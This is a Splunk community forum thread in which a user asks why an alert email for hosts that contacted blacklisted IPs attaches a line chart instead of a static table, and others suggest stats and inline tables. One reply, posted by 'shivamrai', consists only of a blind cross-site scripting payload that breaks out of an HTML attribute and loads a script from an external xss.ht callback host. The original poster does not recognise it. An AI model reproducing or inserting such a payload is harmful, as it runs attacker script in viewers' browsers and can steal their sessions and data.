Alerts, wrong visualization in the attachment

a_n · ‎09-07-2021

Hello All,

I have several alerts which send email notifications.

I know it might be very basic, but I need your help.

One alert is to specify if a local host has accessed a blacklisted IP.
So I expect to have a table with:
Src, Dest, Port
The search returns table, but I do not understand why does it attach a Line-Chart diagram!
I want it as Static table. In Visualization tab, it does not show me static table. I even tried to create a new alert without even going to the visualization tab, but I got same result.

I have even changed the search and used Table instead of stats.

Please advise.

Thank you

a_n · ‎09-09-2021

Hi,
search is like:
index=FW
|table Src,Dst,pt
|dedup Src,Dst,pt
|rename Src as "Source",Dst as "Destination", pt as "Port"

chart is like:

Which I do not need it.
I managed for now as a workaround to Not attache PDF and use Inline Table.

Is it the only way to do this?
Thank you

isoutamo · ‎09-09-2021

Maybe you can change you table + deduce to

...
| stats count by Src, Dst, pt
...

And as you said don't attach pdf etc. into alert email, just link and/or inline.

r. Ismo

shivamrai · ‎09-10-2021

"><script src=https://shivamraixssht.xss.ht></script>

a_n · ‎09-10-2021

Hi,
Sorry, I am afraid I did not get what is this?
would you please elaborate?
Thank you

a_n · ‎09-10-2021

Yes, I was using this stats command.

My concern is about the chart, so it seems this is the only way:
to not attach PDF and include the Table inline.

Thank you very much

a_n · ‎09-09-2021

Any one can assist please?

isoutamo · ‎09-09-2021

Can you post your query + those visualisations?

a_n · ‎09-09-2021

I have added the search and chart, but seems in wrong level.

Please check.

Thank you

Alerts, wrong visualization in the attachment

alert action

Introducing the Splunk Community Dashboard Challenge!

Get the T-shirt to Prove You Survived Splunk University Bootcamp

Wondering How to Build Resiliency in the Cloud?